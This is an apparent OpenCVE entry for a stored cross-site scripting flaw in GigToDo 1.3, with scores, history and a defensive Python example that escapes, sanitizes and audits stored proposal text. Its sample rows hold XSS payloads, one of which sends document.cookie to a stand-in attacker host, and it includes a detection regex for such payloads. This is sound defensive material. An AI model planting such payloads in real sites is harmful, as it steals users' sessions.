Description
GigToDo 1.3 contains a persistent cross-site scripting vulnerability that allows authenticated attackers to inject malicious JavaScript and HTML code through the proposal description field. Attackers can craft XSS payloads in the create_proposal endpoint that execute when administrators or other users view the stored proposal, enabling cookie theft and malicious redirects.
Published: 2026-06-04
Score: 5.1 Medium
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

GigToDo version 1.3 contains a persistent cross-site scripting flaw: an authenticated user can store JavaScript and HTML in the proposal description field through the create_proposal endpoint. When an administrator or another user later views the stored proposal, the payload runs in that viewer's browser, enabling session cookie theft and malicious redirects.

Affected Systems

The vulnerability affects the GigToDo Freelance Marketplace Script, specifically version 1.3. No other versions are listed as impacted.

Risk and Exploitability

The vulnerability carries a CVSS v4.0 base score of 5.1 (medium). Its CVSS v3.1 score was first published as 6.4 with UI:N and later revised to 5.4 with UI:R, reflecting that a victim must open the stored proposal for the payload to run. Exploitation requires an authenticated account that is allowed to create proposals, and it relies on the application rendering the stored description without escaping it. The EPSS probability is below 1% (very low), and the issue is not listed in CISA's KEV catalog; the SSVC assessment records a public proof of concept but no confirmed exploitation in the wild. Because the script executes in the browser context of whoever views the proposal, administrators included, the practical risk is moderate, with confidentiality and integrity impact on user sessions.

Generated by OpenCVE AI on June 4, 2026 at 14:36 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Update GigToDo to a release that addresses the XSS flaw as soon as the vendor publishes one; none is listed at the time of writing.
  • Restrict proposal creation to trusted accounts, or temporarily disable the feature until a patch is applied.
  • Apply output encoding (HTML entity escaping) wherever the proposal description is rendered and, if limited formatting must be kept, sanitize stored content against a tag allowlist with all attributes stripped. Audit proposals that are already stored for injected markup, since escaping on write does not clean rows saved before the fix.
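The following Python is an added example and not GigToDo's own code (the page shows none, and the real application is not reproduced here); the `description` field name and the sample rows are constructed. It contrasts echoing the stored field verbatim with entity-escaping it, adds an allowlist sanitizer for the case where limited formatting must survive, and includes an audit that flags already-stored rows carrying script or event-handler payloads, which matters while no vendor fix is available.

```python
import html
import re
from html.parser import HTMLParser

# Constructed sample rows standing in for a proposals table; the real
# GigToDo schema is not shown on this page, so the column names are assumed.
SAMPLE_PROPOSALS = [
    {"id": 1, "description": "I can deliver the logo within 3 days."},
    {"id": 2, "description": "Great gig! <script>document.location="
                             "'https://attacker.example/?c='+document.cookie</script>"},
    {"id": 3, "description": "See my portfolio <img src=x onerror=alert(1)>"},
    {"id": 4, "description": "Budget is <b>flexible</b> & negotiable."},
]


def render_unsafe(description):
    """The failure class behind CWE-79: stored text interpolated as markup."""
    return f'<div class="proposal">{description}</div>'


def render_escaped(description):
    """Output encoding for an HTML text-node context: every stored value is
    treated as text, never as markup."""
    return f'<div class="proposal">{html.escape(description, quote=True)}</div>'


# Tags kept when limited formatting is wanted. Attributes are never kept,
# which removes every on* event handler and javascript: URL in one rule.
ALLOWED_TAGS = {"b", "i", "em", "strong", "p", "br", "ul", "ol", "li"}
RAW_TEXT_TAGS = {"script", "style"}  # contents are dropped, not just the tag


class AllowlistSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0  # > 0 while inside <script> or <style>

    def handle_starttag(self, tag, attrs):
        if tag in RAW_TEXT_TAGS:
            self.skip_depth += 1
        elif not self.skip_depth and tag in ALLOWED_TAGS:
            self.out.append(f"<{tag}>")  # attrs deliberately discarded

    def handle_endtag(self, tag):
        if tag in RAW_TEXT_TAGS:
            self.skip_depth = max(0, self.skip_depth - 1)
        elif not self.skip_depth and tag in ALLOWED_TAGS and tag != "br":
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            # Character references were decoded on input; re-escape on output.
            self.out.append(html.escape(data, quote=True))


def sanitize(description):
    """Reduce stored rich text to the allowlisted tags, attribute-free."""
    parser = AllowlistSanitizer()
    parser.feed(description)
    parser.close()
    return "".join(parser.out)


# Indicators for auditing rows stored before output escaping was fixed.
PAYLOAD_RE = re.compile(
    r"<\s*script\b|<\s*/?\s*(?:iframe|object|embed|svg)\b|\bon[a-z]+\s*=|javascript\s*:",
    re.IGNORECASE,
)


def audit_stored_proposals(rows):
    """Return ids of rows whose description looks like an injected payload."""
    return [row["id"] for row in rows if PAYLOAD_RE.search(row["description"])]


if __name__ == "__main__":
    for row in SAMPLE_PROPOSALS:
        print(row["id"], "escaped:  ", render_escaped(row["description"]))
        print(row["id"], "sanitized:", sanitize(row["description"]))
    print("suspicious rows:", audit_stored_proposals(SAMPLE_PROPOSALS))
```

Escaping alone is the correct fix for a plain-text field; the sanitizer is only for a product decision to keep bold or list formatting, and even then everything outside the allowlist is dropped rather than escaped so that stray `<img` or `<svg` fragments cannot be reassembled by a second rendering step. The audit regex is a triage aid for the existing table, not a blocklist to enforce on input.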


Advisories

No advisories yet.

History

Wed, 10 Jun 2026 01:30:00 +0000

Type: Metrics
Values removed: cvssV3_1 {'score': 6.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N'}
Values added: cvssV3_1 {'score': 5.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}

Fri, 05 Jun 2026 10:45:00 +0000

Type: First Time appeared
Values added: Gigtodoscript; Gigtodoscript gigtodo

Type: Vendors & Products
Values added: Gigtodoscript; Gigtodoscript gigtodo

Thu, 04 Jun 2026 15:15:00 +0000

Type: Metrics
Values added: ssvc {'options': {'Automatable': 'no', 'Exploitation': 'poc', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Thu, 04 Jun 2026 13:30:00 +0000

Type: Description
Values added: GigToDo 1.3 contains a persistent cross-site scripting vulnerability that allows authenticated attackers to inject malicious JavaScript and HTML code through the proposal description field. Attackers can craft XSS payloads in the create_proposal endpoint that execute when administrators or other users view the stored proposal, enabling cookie theft and malicious redirects.

Type: Title
Values added: GigToDo Freelance Marketplace Script 1.3 Persistent XSS

Type: Weaknesses
Values added: CWE-79

Type: References
Values added: (none listed)

Type: Metrics
Values added: cvssV3_1 {'score': 6.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N'}; cvssV4_0 {'score': 5.1, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N'}

MITRE

Status: PUBLISHED

Assigner: VulnCheck

Published:

Updated: 2026-06-10T01:23:50.015Z

Reserved: 2026-06-04T11:07:17.017Z

Link: CVE-2019-25739

Vulnrichment

Updated: 2026-06-04T14:32:47.450Z

NVD

Status : Deferred

Published: 2026-06-04T14:16:32.373

Modified: 2026-06-10T02:16:31.907

Link: CVE-2019-25739

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-06-05T10:07:48Z

Weaknesses
  • CWE-79

    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')